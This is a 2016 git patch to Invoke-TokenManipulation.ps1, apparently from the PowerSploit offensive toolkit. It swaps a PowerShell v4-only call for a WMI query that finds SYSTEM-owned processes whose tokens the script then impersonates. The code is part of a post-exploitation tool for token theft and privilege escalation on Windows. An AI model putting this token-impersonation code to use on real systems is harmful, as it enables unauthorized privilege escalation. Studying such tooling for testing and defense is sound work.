From f305e31cf56ced7941ccbd7864a3f372037dc91c Mon Sep 17 00:00:00 2001
From: Matt Graeber <matt@exploit-monday.com>
Date: Thu, 10 Mar 2016 16:48:37 -0800
Subject: Bugfix: Invoke-TokenManipulation. Issue #112

Fixed the PSv4 dependency for obtaining process ownership information.
Thanks to @mmashwani for suggesting the WMI solution.
---
 Exfiltration/Invoke-TokenManipulation.ps1 | 25 +++++++++++++++++++------
 1 file changed, 19 insertions(+), 6 deletions(-)

diff --git a/Exfiltration/Invoke-TokenManipulation.ps1 b/Exfiltration/Invoke-TokenManipulation.ps1
index ea30952..6558a63 100644
--- a/Exfiltration/Invoke-TokenManipulation.ps1
+++ b/Exfiltration/Invoke-TokenManipulation.ps1
@@ -1686,20 +1686,33 @@ Blog on this script: http://clymb3r.wordpress.com/2013/11/03/powershell-and-toke
         #Even if already running as system, later parts on the script depend on having a SYSTEM token with most privileges.
         #We need to enumrate all processes running as SYSTEM and find one that we can use.
         [string]$LocalSystemNTAccount = (New-Object -TypeName 'System.Security.Principal.SecurityIdentifier' -ArgumentList ([Security.Principal.WellKnownSidType]::'LocalSystemSid', $null)).Translate([Security.Principal.NTAccount]).Value
-        $SystemTokens = Get-Process -IncludeUserName | Where {$_.Username -eq $LocalSystemNTAccount}
+        
+        $SystemTokens = Get-WmiObject -Class Win32_Process | ForEach-Object {
+            $OwnerInfo = $_.GetOwner()
+
+            if ($OwnerInfo.Domain -and $OwnerInfo.User) {
+                $OwnerString = "$($OwnerInfo.Domain)\$($OwnerInfo.User)".ToUpper()
+
+                if ($OwnerString -eq $LocalSystemNTAccount.ToUpper()) {
+                    $_
+                }
+            }
+        }
+
         ForEach ($SystemToken in $SystemTokens)
         {
-            $SystemTokenInfo = Get-PrimaryToken -ProcessId $SystemToken.Id -WarningAction SilentlyContinue -ErrorAction SilentlyContinue
+            $SystemTokenInfo = Get-PrimaryToken -ProcessId $SystemToken.ProcessId -WarningAction SilentlyContinue -ErrorAction SilentlyContinue
+            if ($SystemTokenInfo) { break }
         }
-        if ($systemTokenInfo -eq $null -or (-not (Invoke-ImpersonateUser -hToken $systemTokenInfo.hProcToken)))
+        if ($SystemTokenInfo -eq $null -or (-not (Invoke-ImpersonateUser -hToken $systemTokenInfo.hProcToken)))
         {
             Write-Warning "Unable to impersonate SYSTEM, the script will not be able to enumerate all tokens"
         }
 
-        if ($systemTokenInfo -ne $null -and $systemTokenInfo.hProcToken -ne [IntPtr]::Zero)
+        if ($SystemTokenInfo -ne $null -and $SystemTokenInfo.hProcToken -ne [IntPtr]::Zero)
         {
-            $CloseHandle.Invoke($systemTokenInfo.hProcToken) | Out-Null
-            $systemTokenInfo = $null
+            $CloseHandle.Invoke($SystemTokenInfo.hProcToken) | Out-Null
+            $SystemTokenInfo = $null
         }
 
         $ProcessIds = get-process | where {$_.name -inotmatch "^csrss$" -and $_.name -inotmatch "^system$" -and $_.id -ne 0}
-- 
cgit v1.2.3